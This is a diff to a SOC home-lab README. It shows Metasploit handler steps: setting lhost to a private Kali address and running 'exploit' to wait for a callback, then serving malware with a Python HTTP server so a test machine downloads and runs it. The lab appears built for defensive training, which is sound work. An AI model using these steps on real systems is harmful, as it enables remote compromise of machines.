Shalini766/SOC-Home-Lab-Setup/README.md

 - Type options to see the changed payload

 Now, change the lhost to Kali
-- Enter *set lhost 192.168.20.11*
+- Enter ***set lhost 192.168.20.11***
--

 Now we can start the handler
 - Enter *exploit*
 and listen in, and wait for the test machine to download and execute our malware.

+For our test machine to download the malware, we have to set the HTTP server using Python in Kali
+- be in the same directory as our malware
+- terminal -> python3 -m http.server 9999 (use a port that is not in use)

+This allows the test machine to act as a Kali machine and start downloading the malware.